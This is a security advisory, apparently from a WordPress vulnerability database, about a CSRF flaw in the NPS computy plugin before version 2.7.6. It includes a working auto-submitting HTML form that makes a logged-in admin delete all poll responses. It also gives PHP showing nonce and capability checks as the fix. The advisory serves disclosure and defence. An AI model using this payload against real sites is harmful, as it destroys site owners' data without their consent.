wpexploit | Bob Matyas | WPEX-ID:481A376B-55BE-4AFA-94F5-C3CF8A88B8D1
History: Mar 25, 2024 - 12:00 a.m.

NPS computy < 2.7.6 - Results Deletion via CSRF

2024-03-25 00:00:00
Bob Matyas
21
nps
version 2.7.6
cross-site request forgery
results deletion

AI Score: 9.5 High (Confidence: High)

EPSS: 0.0004 Low (Percentile: 9.2%)

Description: The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks.

Make a logged-in admin open the following:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=nps-plugin-options" method="POST">
        <input type="text" id="event" name="event" value='delete_all'>
        <input type="submit" value="submit" name="add">
    </form>
</body>
```

The result is that all existing poll responses are deleted.
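For plugin authors and reviewers, the missing control is a nonce check on the state-changing request. The sketch below is an added example, not code from NPS computy; the function names, nonce action, field name and results table are hypothetical, and only the `event=delete_all` parameter comes from the request shown above.

```php
<?php
// Added illustration. Handler, nonce and table names are hypothetical,
// not taken from the NPS computy source.

// Render the "delete all" form with a nonce bound to this action and user.
function nps_example_render_delete_form() {
    ?>
    <form method="post">
        <?php wp_nonce_field( 'nps_example_delete_all', 'nps_example_nonce' ); ?>
        <input type="hidden" name="event" value="delete_all">
        <?php submit_button( 'Delete all responses', 'delete' ); ?>
    </form>
    <?php
}

// Process the POST only when it carries a valid nonce and the user is an admin.
function nps_example_handle_delete_all() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    $event = isset( $_POST['event'] ) ? sanitize_key( wp_unslash( $_POST['event'] ) ) : '';
    if ( 'delete_all' !== $event ) {
        return;
    }
    // Authorization check: CSRF protection does not replace a capability check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request when the nonce is missing or invalid. A form hosted on
    // another site cannot read the admin's nonce, so its submission ends here.
    check_admin_referer( 'nps_example_delete_all', 'nps_example_nonce' );

    global $wpdb;
    // Hypothetical results table name.
    $wpdb->query( "DELETE FROM {$wpdb->prefix}nps_example_results" );
}
add_action( 'admin_init', 'nps_example_handle_delete_all' );
```

When auditing a plugin for this class of bug, look for handlers that read `$_POST` or `$_GET` and change state without a preceding `check_admin_referer()` or `wp_verify_nonce()` call.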
